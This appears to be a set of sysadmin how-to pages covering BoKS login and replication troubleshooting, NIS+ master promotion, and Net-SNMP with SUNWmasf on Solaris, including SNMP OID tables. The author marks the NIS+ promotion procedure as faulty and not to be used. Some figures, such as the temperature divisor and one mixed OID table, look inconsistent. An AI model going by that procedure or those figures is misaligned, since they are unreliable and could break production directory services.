8. Check the replica server's definition in the BoKS database.

Keon> dumpbase | grep RNAME | grep $replica

The TYPE field in the definition of the replica should be set to 261. Anything else is wrong, so you need to update the configuration in the BoKS database. Either that or have SecOPS do it for you.

9. Check the BoKS configuration on the replica.

On the replica system, review the settings in /etc/opt/boksm/ENV.

10. Debug replication processes.

If all of the above fails you should really get cracking with the debugger. Refer to the appropriate chapter of this manual for details.

1.3 SCENARIO: You can't log in to a BoKS client

Most obviously we can't do our work on that particular server and neither can our customers. Naturally this is something that needs to be fixed quite urgently!

  1. Check BoKS transaction log.
  2. Check if you can log in.
  3. Check BoKS communications
  4. Check bcastaddr and bremotever files.
  5. Check BoKS port number.
  6. Check node keys
  7. Check BoKS error logs.
  8. Debug servc process on replica server or relevant process on client.

All commands are run in a BoKS shell, on the master server unless specified otherwise.

1. Check BoKS transaction log.

Keon> cd /var/opt/boksm/data

Keon> grep $user LOG | bkslog -f - -wn

This should give you enough output to ascertain why a certain user cannot login. If there is no output at all, do the following:

Keon> cd /var/junkyard/bokslogs

Keon> for file in `ls -lrt | tail -5 | awk '{print $9}'`
> do
> grep $user $file | bkslog -f - -wn
> done

If this doesn't provide any output, perform step 2 as well to see if we sysadmins can log in.

2. Check if you can log in.

Pretty self-explanatory, isn't it? Try to log in yourself.

3. Check BoKS communications.

Keon> cadm -l -f bcastaddr -h $client

4. Check bcastaddr and bremotever files.

Login to the client through its console port.

Keon> cat /etc/opt/boksm/bcastaddr

Keon> cat /etc/opt/boksm/bremotever

These two files should match the same files on another working client. Do not use a replica or master to compare the files: these are different over there. If you make any changes you will need to restart the BoKS processes using the Boot command.

5. Check BoKS port number.

On the client and master run:

Keon> getent services boks

This should return the same value for the BoKS base port on both. If it doesn't, check either /etc/services or NIS+. If you make any changes you will need to restart the BoKS processes using the Boot command.

6. Check node keys.

On the client system run:

Keon> hostkey

Take the output from that command and run the following on the master:

Keon> dumpbase | grep $hostkey

If this doesn't return the definition for the client server, the keys have become unsynchronized. Reset them and restart the BoKS client software. If you make any changes you will need to restart the BoKS processes using the Boot command.

7. Check BoKS error logs.

This should be pretty self-explanatory. Read the /var/opt/boksm/boks_errlog file on both the master and the client to see if you can detect any errors there. If the log file does mention something about the hosts involved, you should be able to find the cause of the problem pretty quickly.

8. Debug servc process on replica server or relevant process on client.

If all of the above fails you should really get cracking with the debugger. Refer to the appropriate chapter of this manual for details (see chapter: SCENARIO: Setting a trace within BoKS).

NOTE: If you need to restart the BoKS software on the client without logging in, try doing so using a remote management tool, like Tivoli.

1.4 SCENARIO: The BoKS client queues are filling up

The whole of BoKS is still up and running and everything's working perfectly. The only client(s) that won't work are the one(s) that have stuck queues. The only way you'll find out about this is by running boksdiag fque -bridge, which reports all of the queues which are stuck.

  1. Check if client is up and running.
  2. Check BoKS communications.
  3. Check node keys.
  4. Check BoKS error logs.

All commands are run in a BoKS shell, on the master server unless specified otherwise.

1. Check if client is up and running.

Keon> ping $client

Also ask your colleagues to see if they're working on the system. Maybe they're performing maintenance.

2. Check BoKS communications.

Keon> cadm -l -f bcastaddr -h $client

3. Check node keys.

On the client system run:

Keon> hostkey

Take the output from that command and run the following on the master:

Keon> dumpbase | grep $hostkey

If this doesn't return the definition for the client server, the keys have become unsynchronised. Reset them and restart the BoKS client software using the Boot command.

4. Check BoKS error logs.

This should be pretty self-explanatory. Read the /var/opt/boksm/boks_errlog file on both the master and the client to see if you can detect any errors there. If the log file does mention something about the hosts involved, you should be able to find the cause of the problem pretty quickly.

NOTE: What can we do about it?

If you're really desperate to get rid of the queue, do the following:

Keon> boksdiag fque -bridge -delete $client-ip

At one point in time we thought it would be wise to manually delete messages from the spool directories. Do not under any circumstance touch the crypt_spool and master_spool directories in /var/opt/boksm. Really: DON'T DO THIS! This is unnecessary and will lead to troubles with BoKS.

1.5 SCENARIO: Setting a trace within BoKS

We are required to run a BoKS debug trace when either:

  1. People are unable to login without any apparent reason. A debug will show why logins are getting rejected.
  2. We have run into a bug or a problem with BoKS which cannot easily be dealt with through e-mail. TFS Tech support will usually request us to perform a number of traces and send them the output files.

First off, let me warn you: debug trace log files can grow pretty vast pretty fast! Make sure that you turn on the trace only right before you're ready to use the faulty part of BoKS and also be sure to stop the trace immediately once you're done.

Now, before you can start a trace you will need to make sure that the BoKS client system only performs transactions with one BoKS server. If you don't, you will have no way of knowing on which server you should run the trace.

Login to the client system experiencing problems.

$ su -

# cd /etc/opt/boksm

# cp bcastaddr bcastaddr.orig

# vi bcastaddr

Edit the file in such a way that it only points to one of the available BoKS servers, preferably a BoKS replica. Please refrain from using the BoKS master server.

# /opt/boksm/sbin/boksadm -S Boot -k

# sleep 10; ps -ef | grep -i boks | awk '{print $2}' | xargs kill

# /opt/boksm/sbin/boksadm -S Boot

Now, how you proceed depends on what problems you are experiencing.

If people are having problems logging in:

Log in to the replica server and start a BoKS shell with sx.

# sx /opt/boksm/sbin/boksadm -S

# cd /var/tmp

Now, type the following command, but DO NOT press enter yet.

# bdebug -x 9 bridge_servc_r -f /var/tmp/BR-SERVC.trace

Open a new terminal window, because we will try to login to the failing client. BEFORE YOU START THE TOOL USED TO LOGIN (SSH, Telnet, FTP, whatever), press enter at the command waiting on the replica server. Attempt to login as usual. If it fails, you have successfully set a trace. Switch back to the window on the replica server and run the following command to stop the trace.

# bdebug -x 0 bridge_servc_r

Repeat the same process once more, but this time around debug the servc process instead of bridge_servc_r. Send the output to /var/tmp/SERVC.trace.

You can now read through the files /var/tmp/BR-SERVC.trace and /var/tmp/SERVC.trace to troubleshoot the problem yourself, or you could send them to TFS Tech for analysis. If the attempted login did NOT fail, there's something else going on: one of the other replica servers is not working properly! Find out which one it is by changing the client's bcastaddr file, each time using a different BoKS server as a target.

If you are attempting to troubleshoot another kind of problem:

Tracing any other part of BoKS isn't really all that different from tracing the login process. You prepare in the same way (make bcastaddr point at one BoKS server) and you will probably have to prepare the trace on bridge_servc_r as well (see the text block above; if you do not have to trace bridge_servc_r, TFS Tech will probably tell you so).

Yet again, BEFORE you start the trace on the master side by running

# bdebug -x 9 bridge_servc_r -f /var/tmp/SERVC.trace

you will have to go to the client system with the problematic situation and perform the following.

# cd /var/tmp

# bdebug -x 9 $PROG -f /var/tmp/$PROG.trace

$PROG in this case is the name of the BoKS process (bridge_servc_r, drainmast_download) or the access method (login, su, sshd) that you want to debug.

Now, start both traces and attempt to perform the task that is failing. Once it has failed, stop both traces again using bdebug -x 0 $PROG.

1.6 SCENARIO: Debugging the BoKS SSH daemon

From time to time you may have problems with the BoKS SSH daemon which cannot be explained in any logical way. At such a time a debug trace of the SSH daemon can be very helpful! This can be done by temporarily starting a second daemon on an unused port.

On the troubled system, login and start a BoKS shell:

# /opt/boksm/sbin/boksadm -S

Keon> boks_sshd -d -d -d -p 24 > /tmp/sshd.out 2>&1

From another system:

$ ssh -l $username -p24 $target-host

Try logging in; it shouldn't work :) Now close the SSH session with Ctrl-C, which should also close the temporary SSH daemon on port 24. /tmp/sshd.out should now contain all of the debugging information you or TFS Technology could need.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Promoting NIS+ replicas into master servers

2008-01-01 00:00:00

EDIT: 23/11/2004

DO NOT USE THE FOLLOWING PROCEDURE! IT HAS PROVEN TO BE FAULTY AND SHOULD ONLY BE USED AS A GUIDELINE FOR MAKING YOUR OWN PROCEDURE!

I will try and correct all of the mistakes as soon as possible.. Please be patient...

At some point in time it may happen that your NIS+ master server has become too old or overloaded to function properly. Maybe you used old, decrepit hardware to begin with, or maybe you have been using NIS+ in your organisation for ages :) Anywho, you've now reached the point where the new hardware has received its proper build and the server is ready to assume its role as NIS+ master.

Of course you want things to go smoothly and with as little downtime as possible. One of the methods to go about this is to use the other procedure in this menu: "Rebuild your master". That way you'll literally build a new master server, after which you reload all of the database contents from raw ASCII dumps.

The other method would be to use the procedure below :) This way you'll transfer mastership of all your NIS+ databases from the current master to the new one. I must admit that I haven't used this procedure in our production environment as of yet (15/11/04), but I will in about a week! But even after that time, after I've added alterations and after I've fixed any errors, don't come suing me because the procedure didn't work for you. NIS+ can be a fickle little bitch if she really wants to...


This procedure requires that your new NIS+ master server is already a replica server. There are numerous books and procedures on the web which describe how to promote a NIS+ client into a replica, but I'll include that procedure in the menu sometime soon.

Before you begin, disable replication of NIS+ on any other replica servers you may have running. This is easily done by killing the rpc.nisd process on each of these systems. Beware though that all of the replicas do need to remain functioning NIS+ clients! This ensures that their NIS_COLD_START gets updated.

Log in to both the current master and the replica server you wish to upgrade. Become root on both systems.

On the master server:

# for table in `nisls`

>do

>nismkdir -m $replica $table

>done

# cd /var/nis/data

# scp root.object $user@$replica:/tmp

On the replica server:

# cd /var/nis/data

# mv /tmp/root.object .

# chown root:root root.object

# chmod 644 root.object

Kill all NIS processes on both the master and the replica in question. Then restart on the replica using:

# /usr/sbin/rpc.nisd -S 0

# /usr/sbin/nis_cachemgr -i

Verify that the replica server is now recognised as the current master server by using the following commands.

# nisshowcache -v

# niscat -o groups_dir.`domainname`.

# niscat -o org_dir.`domainname`.

# niscat -o `domainname`.

If the replica system is not recognised as the master, re-run the for-loop which was described above. This will re-run the nismkdir command for each table that isn't configured properly.

# for table in `nisls`

>do

> nischown `hostname` $table.`domainname`.

> for subtable in `nisls $table | grep -v $table`

> do

> nischown `hostname` $subtable.$table

> done

>done

Once again verify the ownership of the tables which you just modified.

# niscat -o `domainname`.

# niscat -o passwd.org_dir

Checkpoint the whole NIS+ domain.

# for table in `nisls`

>do

>nisping -C $table

>done

Kill all NIS+ daemons on the new master. Then restart using:

# /usr/sbin/rpc.nisd

# /usr/sbin/nis_cachemgr -i

Currently the old master has reverted to replica status. If you want to remove the old master from the infrastructure as a server, proceed with the next section.


Login to both the new master and the old master. Become root on both.

On the new master:

# for table in `nisls`

>do

>nisrmdir -s $oldmaster $table

>done

Checkpoint the whole NIS+ domain.

# for table in `nisls`

>do

>nisping -C $table

>done

Now make the old NIS+ master a client system.

# rm -rf /var/nis

# /usr/sbin/rpc.nisd

# nisinit -c -H $newmaster

# nisclient -i -d `domainname` -h $newmaster


kilala.nl tags: , , ,

View or add comments (curr. 0)

Combining net-SNMP and SUNWmasf on Solaris

2008-01-01 00:00:00

In some cases you're going to want to use Net-SNMP on your Solaris hosts, while still being able to monitor Sun-specific SNMP objects. It took me a while to get all of this to work and it's a bit of a puzzle, but here's how to make it work.

In our current environment at $CLIENT we want to standardise all of our UNIX hosts to the Net-SNMP agent software. This will allow us to use a configuration file which can be at least 60% identical on each host, making life just a little bit easier for all of us. Unfortunately Net-SNMP isn't equipped to deal with all of Sun's specific SNMP objects, so we're going to have to make a few big modifications to the software.

Of course packaging all these changes into one big .PKG is the nicest way of ensuring that all required changes are made in one blow, so that's what I've done. Unfortunately I cannot share this package with you, since it contains quite a large amount of $CLIENT internal information. I may be tempted at another time to recreate a non-$CLIENT version of the package that can be used elsewhere.


Re-compiling Net-SNMP

The latest versions of Net-SNMP come with experimental LM_Sensors support for Sun hardware. Oddly, I've found that you need to drop one version below the latest to get it to work nicely with Solaris 8. So here are the steps to take...

  1. Download the source code for Net-SNMP version 5.2.3 from their website.
  2. Move the .TGZ to your build system and unpack it in your regular build location. Also, building Net-SNMP successfully requires OpenSSL 0.9.7g or higher, so make sure that it's installed on your build system.
  3. Run the configure script with the following options:

    --with-mib-modules="host disman/event-mib ucd-snmp/diskio smux agentx disman/event-mib ucd-snmp/lmSensors" --with-perl-module

  4. Run "make", "make test" and "make install" to complete the creation of Net-SNMP (the whole sequence is sketched out after this list). If "make test" fails on every check, it is likely that your system is unable to find the requisite OpenSSL libraries. This may be solved by running:

    /usr/bin/crle -c /var/ld/ld.config -l /lib:/usr/lib:/usr/local/lib:/usr/local/ssl/lib

  5. After "make install" has finished all the Net-SNMP files have been installed on your build system. Naturally it's important to know which files to include in your package. To help you, I've created a list of the files that are installed.
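Put together, the build boils down to the sketch below. The download location and build directory are assumptions on my part; the configure options are the ones from step 3.

cd /usr/local/src
gzip -dc net-snmp-5.2.3.tar.gz | tar xf -       # the tarball downloaded in step 1
cd net-snmp-5.2.3
./configure --with-mib-modules="host disman/event-mib ucd-snmp/diskio smux agentx disman/event-mib ucd-snmp/lmSensors" --with-perl-module
make
make test                                       # if every check fails, see the crle note in step 4
make install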

Installing SUNWmasf and its components

PLEASE NOTE: SUNWmasf will currently (July of 2006) only get useful results on the following models: V210, V240, V250, V440, V1280, E2900, N210, N240, N440, N1280. On other systems you may have more luck using the LM_Sensors pieces of Net-SNMP. They have been tested to work on E450, V880 and 280R.

As I mentioned earlier Net-SNMP with LM_Sensors can only gather limited amounts of Sun specific information. That's besides the fact that it is also still an experimental feature. So we're going to need an alternative SNMP agent to gather more information for us. Enter the SUNWmasf package.

SUNWmasf and its components may be downloaded from the Sun Microsystems website. Either use this direct link (which may be subject to change), or go to www.sun.com/download and search for "Sun SNMP Management Agent".

You can opt to install SUNWmasf manually on each of your clients, but it would be much nicer to include it into your custom made package. To have a full list of all the files and symlinks that you should include, you can take a peek at the prototype file I made for the package. It includes all the files required for Net-SNMP.

Installation of the software couldn't be easier. Just run the following command, after extracting the .TAR.Z file that contains SUNWmasf.

pkgadd -d . SUNWescdl SUNWescfl SUNWeschl SUNWescnl SUNWescpl SUNWmasf SUNWmasfr


Configuring SUNWmasf

Go into /etc/opt/SUNWmasf/conf and replace the snmpd.conf file with the following:

rocommunity public

agentaddress 1161

agentuser daemon

agentgroup daemon


Configuring Net-SNMP

The configuration file for Net-SNMP is located in /usr/local/share/snmp. You will need to make a whole bunch of changes over here that I won't cover, like security ACLs, SNMP trap hosts and bunches of other stuff. However, you _will_ need to add the following lines to allow Net-SNMP to talk to SUNWmasf.

proxy -c public localhost:1161 .1.3.6.1.4.1.42

proxy -c public localhost:1161 .1.3.6.1.2.1.47
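Once both agents are running (see the next section for the start-up order), a quick walk through the proxied part of the tree tells you whether the plumbing works. Host and community string are whatever you configured, of course:

snmpwalk -c public localhost .1.3.6.1.4.1.42 | head -5     # should show SUNWmasf data via the proxy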


Starting the software

Since SUNWmasf relies upon Net-SNMP, it will need to be started after that piece of software. The prototype file I mentioned earlier already takes this into account, but if you're not going to use it just make sure that /etc/init.d/masfd gets called _after_ /etc/init.d/snmpd during the boot process.

Also, I've noticed that SUNWmasf will need about thirty seconds before it can be read using commands like snmpget and snmpwalk.


Reading values from the agents

As you may well know, SNMP is a tangly web of numerical identifiers. I will make a nice overview of the various useful OIDs that you can use for monitoring through both LM_Sensors and SUNWmasf. However, I will put these in a separate document, since it falls outside the scope of this mini-howto.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Interesting SUNWmasf (Management Agent for Sun Fire) SNMP objects

2008-01-01 00:00:00

In my mini-howto about monitoring Sun specific SNMP objects through Net-SNMP I referred to a few interesting objects which could be read through SUNWmasf.

Unfortunately I can currently only list details for two of the supported models, since I do not have test boxen for the other models. The following lists are only a small selection of all possible objects that we found interesting. A full list of available options can be obtained by running:

snmpwalk -c public localhost .1.3.6.1.2.1.47.1.1.1.1.2

Details about the structure of the various MIBs can be found in other articles in the Sysadmin section of my website. Just browse through the menu on the left. Point is that the lists below only list the OID _within_ the specific sub-trees (for example: .1.3.6.1.2.1.47.1.1.1.1.2.46). As I said: details on actually _reading_ these values will be contained in another document.

The possible values for service indicators (enterprise.42.2.70.101.1.1.12.1.2.$OID) are:

1 = unknown, 2 = off, 3 = on, 4 = alternating

The possible values for the keyswitch (enterprise.42.2.70.101.1.1.9.1.1.$OID) are:

1 = unknown, 2 = stand-by, 3 = normal, 4 = locked, 5 = diag

Sun Fire V240

Object                 | Description                              | Unit
.21 .23 .25 and .27    | HDD[0-3] Service required indicator      | Integer
.39                    | SYSTEM Service required indicator        | Integer
.33 and .36            | PSU[0-1] Service required indicator      | Integer
.69 and .70            | CPU[0-1] Core temperature                | Degrees
.71                    | SYSTEM Enclosure temperature             | Degrees
.99 and .100           | PSU[0-1] Over-temperature warning        | Integer
.81 .82 and .83        | SYSTEM Enclosure fan[0-2] tacho meter    | Integer
.84 .85 .86 and .87    | CPU[0-1] Fan[0-1] tacho meter            | Integer
.91 and .92            | PSU[0-1] Fan underspeed warning          | Integer
.31 and .34            | PSU[0-1] Active (power?)                 | Integer

Sun Fire V440

Object                    | Description                            | Unit
.28 .30 .32 and .34       | HDD[0-3] Service Required indicator    | Integer
.37 and .41               | PSU[0-1] Service Required indicator    | Integer
.46                       | SYSTEM Service Required indicator      | Integer
.43                       | Keyswitch                              | Integer
.98 .100 .102 and .104    | CPU[0-3] Core temperature              | Degrees
.106                      | MOBO temperature                       | Degrees
.107                      | SCSI temperature                       | Degrees
.131 and .132             | PSU[0-1] Predict fan fault             | Integer
.121                      | PCIFAN tacho meter                     | Integer
.122 and .123             | CPUFAN[0-1] tacho meter                | Integer
.36 and .40               | PSU[0-1] Power OK                      | Integer
.124 .125 .126 and .127   | CPU[0-3] Power fault                   | Integer
.128                      | MOBO Power fault                       | Integer
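To read one of these objects you glue the sub-OID from the table onto the sub-tree it belongs to. For example (my own composition of the service indicator sub-tree mentioned above and the V240's .39 entry, so verify it against your own snmpwalk output):

snmpget -c public localhost .1.3.6.1.4.1.42.2.70.101.1.1.12.1.2.39
# 1 = unknown, 2 = off, 3 = on, 4 = alternating; anything but "off" deserves a closer look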


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Interesting SNMP objects for LM_Sensors on Solaris

2008-01-01 00:00:00

In my mini-howto about monitoring Sun specific SNMP objects through Net-SNMP I referred to a few interesting objects which could be read through LM_Sensors.

Unfortunately I can currently only list details for two of the supported models, since I do not have test boxen for the other models. The following lists are only a small selection of all possible objects that we found interesting. A full list of available options can be obtained by running:

snmpwalk -c public -m ALL localhost .1.3.6.1.4.1.2021.13

Details about the structure of the various MIBs can be found in other articles in the Sysadmin section of my website. Just browse through the menu on the left. Point is that the lists below only list the OID _within_ the specific sub-trees (for example: .1.3.6.1.4.1.2021.13.16.5.1.2.9). As I said: details on actually _reading_ these values will be contained in another document.

Sun Fire V240

Object                      | Description                            | Unit
2.1.2.1 and .2              | CPU[0-1] Core temperature              | Integer *
2.1.2.3                     | SYSTEM Enclosure temperature           | Integer *
5.1.2.2                     | SYSTEM Service required indicator      | Integer
5.1.2.5                     | PSU[0-1] Service required indicator    | Integer
5.1.2.10 .12 .14 and .16    | HDD[0-3] Service required indicator    | Integer
5.1.2.18                    | Keyswitch                              | Integer
5.1.2.4 and .7              | PSU[0-1] Activity (power?)             | Integer

*: In order to get the real temperature, you will need to divide the integer contained within this variable by 65.526. For some odd reason Net-SNMP does not store the real temperature in degrees Centigrade.
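As an illustration of that conversion (the full OID below is my own composition of the sub-tree prefix from the example above plus the CPU 0 row, so treat it as an assumption and check it against your own snmpwalk first):

snmpget -c public localhost .1.3.6.1.4.1.2021.13.16.2.1.2.1 \
    | awk '{ printf "CPU 0 core: %.1f degrees C\n", $NF / 65.526 }'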

Sun Fire V440

Object                      | Description                            | Unit
2.1.2.1 .2 .3 and .4        | CPU[0-3] Core temperature              | Integer *
2.1.2.5 .6 .7 and .8        | CPU[0-3] Ambient temperature           | Integer *
2.1.2.9                     | SCSI temperature                       | Integer *
2.1.2.10                    | MOBO temperature                       | Integer *
.98 .100 .102 and .104      | CPU[0-3] Core temperature              | Degrees
.106                        | MOBO temperature                       | Degrees
.107                        | SCSI temperature                       | Degrees
5.1.2.2                     | SYSTEM Service required indicator      | Integer
5.1.2.6 and .10             | PSU[0-1] Service required indicator    | Integer
5.1.2.12 .14 .16 and .18    | HDD[0-3] Service required indicator    | Integer
5.1.2.20                    | Keyswitch                              | Integer
5.1.2.4 and .8              | PSU[0-1] Power OK                      | Integer

*: In order to get the real temperature, you will need to divide the integer contained within this variable by 65.526. For some odd reason Net-SNMP does not store the real temperature in degrees Centigrade.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Reading from Solaris SNMP agents

2008-01-01 00:00:00

I have to admit that figuring out how all the parts of SNMP on Sun stick together took me a little while. Just like when I was learning Nagios it took me about a week of mucking about to gain clarity. Now that I've figured it out, I thought I'd share it with you...

First off, everything I will describe over here depends on the availability of two pieces of software on your clients: Net-SNMP and SUNWmasf. See the article on combining the two for further details on installing and configuring this software.

We should begin by verifying that you can read from each of the important pieces of the SNMP tree. You can verify this by running the following three commands on your client system. Each should return a long list of names, numbers and values. Don't worry if it doesn't make sense yet.

snmpwalk -c public localhost .1.3.6.1.2.1.47

snmpwalk -c public localhost .1.3.6.1.4.1.42

snmpwalk -c public -m ALL localhost .1.3.6.1.4.1.2021.13

Incidentally you should also be able to access the same parts of the SNMP tree remotely (from your Nagios server, for example).

snmpwalk -c public $remote_client .1.3.6.1.2.1.47

snmpwalk -c public $remote_client .1.3.6.1.4.1.42

snmpwalk -c public -m ALL $remote_client .1.3.6.1.4.1.2021.13

Please keep in mind that you should replace the word "public" in all the examples with the community string that you've chosen for your SNMP agents. It could very well be something other than "public".


Which witch is witch?

Now that we've made sure that you can actually talk to your SNMP agent, it's time to figure out which components you want to find out about. The easy way to find out all components that are available to you is by running the following command.

snmpwalk -c public localhost .1.3.6.1.2.1.47.1.1.1.1.2

Let me explain what the output of this command really means... The SNMP sub-tree MIB-2.47.1.1.1.1 contains descriptive information about system-specific SNMP objects. Each object has a sub-object in the following sub-trees (each number follows after MIB-2.47.1.1.1.1).

Sub-OID | Description
.1      | entPhysicalIndex
.2      | entPhysicalDescr
.3      | entPhysicalVendorType
.4      | entPhysicalContainedIn
.5      | entPhysicalClass
.6      | entPhysicalParentRelPos
.7      | entPhysicalName
.8      | entPhysicalHardwareRev
.9      | entPhysicalFirmwareRev
.10     | entPhysicalSoftwareRev
.11     | entPhysicalSerialNum
.12     | entPhysicalMfgName
.13     | entPhysicalModelName
.14     | entPhysicalAlias
.15     | entPhysicalAssetID
.16     | entPhysicalIsFRU

In this case all the sub-objects under .2 contain descriptions of the various components that are human readable. What you need to do now is go through the complete list of descriptions to pick those elements that you want to access remotely through SNMP. You will see that each entry has a number behind the .2. Each of these numbers is the unique component identifier within the system, meaning that we are lucky enough to have the same identifier within other parts of the SNMP tree.


An example

$ snmpwalk -c public localhost .1.3.6.1.2.1.47.1.1.1.1.2 | grep Core

SNMPv2-SMI::mib-2.47.1.1.1.1.2.98 = STRING: "CPU 0 Core Temperature Monitor"

SNMPv2-SMI::mib-2.47.1.1.1.1.2.100 = STRING: "CPU 1 Core Temperature Monitor"

SNMPv2-SMI::mib-2.47.1.1.1.1.2.102 = STRING: "CPU 2 Core Temperature Monitor"

SNMPv2-SMI::mib-2.47.1.1.1.1.2.104 = STRING: "CPU 3 Core Temperature Monitor"

$ snmpwalk -c public localhost .1.3.6.1.2.1.47.1.1.1.1 | grep "\.98 ="

SNMPv2-SMI::mib-2.47.1.1.1.1.2.98 = STRING: "CPU 0 Core Temperature Monitor"

SNMPv2-SMI::mib-2.47.1.1.1.1.3.98 = OID: SNMPv2-SMI::zeroDotZero

SNMPv2-SMI::mib-2.47.1.1.1.1.4.98 = INTEGER: 94

SNMPv2-SMI::mib-2.47.1.1.1.1.5.98 = INTEGER: 8

SNMPv2-SMI::mib-2.47.1.1.1.1.6.98 = INTEGER: -1

SNMPv2-SMI::mib-2.47.1.1.1.1.7.98 = STRING: "040349/adbs04:CH/C0/P0/T_CORE"

SNMPv2-SMI::mib-2.47.1.1.1.1.8.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.9.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.10.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.11.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.12.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.13.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.14.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.15.98 = ""

SNMPv2-SMI::mib-2.47.1.1.1.1.16.98 = INTEGER: 2


Getting some useful data

Aside from the fact that the sub-OID we have found for our object is used in other parts of the tree, there's another parameter that makes its return. The character string in .7 is reused in the SUN MIB as well, as you will see in a moment.

Let's see what happens when we take our sub-OID .98 to the SUN MIB tree...

$ snmpwalk -c public localhost .1.3.6.1.4.1.42.2.70.101.1.1 | grep "\.98 ="

SNMPv2-SMI::enterprises.42.2.70.101.1.1.2.1.1.98 = INTEGER: 2

SNMPv2-SMI::enterprises.42.2.70.101.1.1.2.1.2.98 = INTEGER: 2

SNMPv2-SMI::enterprises.42.2.70.101.1.1.2.1.3.98 = INTEGER: 7

SNMPv2-SMI::enterprises.42.2.70.101.1.1.2.1.4.98 = INTEGER: 2

SNMPv2-SMI::enterprises.42.2.70.101.1.1.2.1.5.98 = STRING: "040349/adbs04:CH/C0/P0"

SNMPv2-SMI::enterprises.42.2.70.101.1.1.6.1.1.98 = INTEGER: 2

SNMPv2-SMI::enterprises.42.2.70.101.1.1.6.1.2.98 = INTEGER: 3

SNMPv2-SMI::enterprises.42.2.70.101.1.1.6.1.3.98 = Gauge32: 60000

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.1.98 = INTEGER: 3

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.2.98 = INTEGER: 0

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.3.98 = INTEGER: 1

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.4.98 = INTEGER: 41

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.5.98 = INTEGER: 0

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.6.98 = INTEGER: 0

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.7.98 = INTEGER: 0

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.8.98 = INTEGER: 0

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.9.98 = INTEGER: 97

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.10.98 = INTEGER: -10

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.11.98 = INTEGER: 102

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.12.98 = INTEGER: -20

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.13.98 = INTEGER: 120

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.14.98 = Gauge32: 0

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.15.98 = Hex-STRING: FC

SNMPv2-SMI::enterprises.42.2.70.101.1.1.8.1.16.98 = INTEGER: 1

Take a look at 2.1.5.98... Looks familiar? At least now you're sure that you're reading the right sub-object :) The list in the example above looks quite complicated, but there's a little help in the shape of a .PDF I once made. This .PDF shows the basic structure of the objects inside enterprises.42.2.70.101.1.1.

You should immediately notice though that the returns of the command are divided into three groups: ...101.1.1.2, ...101.1.1.6 and ...101.1.1.8. Matching these groups up to the .PDF you'll see that these groups are respectively sunPlatEquipmentTable (which is an expansion on the information from MIB-2), sunPlatSensorTable (which contains a description of the sensor in question) and sunPlatNumericSensorTable (which contains all kinds of real-life values pertaining to the sensor).

In this case the most interesting sub-OID is enterprises.42.2.70.101.1.1.8.1.4.98, sunPlatNumericSensorCurrent, which obviously contains the current value of the sensor readings. Putting things into perspective this means that the core temperature of CPU0 at the time of the snmpwalk was 41 degrees centigrade.


Going on from there

So... Now you know how to find out the following things: which components a system exposes through SNMP, which index number belongs to the component you're interested in, and where to read that component's current value in the Sun MIB.

You can now do loads of things! For example, you can use your monitoring software to verify that certain values don't exceed a set limit. You wouldn't want your CPUs to get hotter than 65 degrees now, do you?
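As a hedged example of what such a check could look like (the OID is the CPU 0 core temperature found above; the threshold, host name and the Nagios-style exit codes are my own choices, not something dictated by the MIB):

#!/bin/sh
# Warn when the CPU 0 core temperature climbs too high (sketch).
HOST=localhost
COMMUNITY=public
OID=.1.3.6.1.4.1.42.2.70.101.1.1.8.1.4.98    # sunPlatNumericSensorCurrent for CPU 0
LIMIT=65

TEMP=`snmpget -c $COMMUNITY $HOST $OID | awk '{print $NF}'`

if [ "$TEMP" -gt "$LIMIT" ]; then
    echo "CRITICAL: CPU 0 core temperature is $TEMP degrees"
    exit 2
fi
echo "OK: CPU 0 core temperature is $TEMP degrees"
exit 0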


kilala.nl tags: , , , ,

View or add comments (curr. 2)

A closer look at SUN-PLATFORM-MIB

2008-01-01 00:00:00

For some reason unknown to me Sun has always kept their MIB file rather closed and hard to find. There's no place you can actually download the file. You will have to extract the file from the SUNWmasf package if you want to take a look at it.

To help us sysadmins out I've published the file over here. I do not claim ownership of the file in any way. Sun has the sole copyright of the file. I just put it here, so people can easily read through the file.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Combining net-SNMP with Dell Open Manage and HP Insight Manager

2008-01-01 00:00:00

Monitoring Dell and HP systems through SNMP is as big a puzzle as using SNMP on Sun Microsystems' boxen. Luckily I've come a long way towards figuring out how to use Net-SNMP together with HP's SIM and Dell's OpenManage.

Just like with our Solaris boxen, we want to use the Net-SNMP daemon as the main daemon on our Linux systems. At $CLIENT we use Red Hat ES3 on a great variety of Dell and HP hardware. And as was the case with SUNWmasf on Solaris, we're going to need both Dell's and HP's custom SNMP agents to monitor our hardware-specific SNMP objects. Enter SIM and OpenManage. In the next few paragraphs I'll tell you all about installing and configuring the whole deal.

Naturally it would be great if you could package all of these files into one nice .RPM, since that'll make the whole installation process a snap. Especially if you want to roll it out across hundreds of servers. I'll be making such a package for $CLIENT, but unfortunately I cannot distribute it (which is logical, what with all the proprietary info that goes into the package). Maybe, some day I'll make a generic .RPM which you guys can use.


Installing HP SIM and its components.

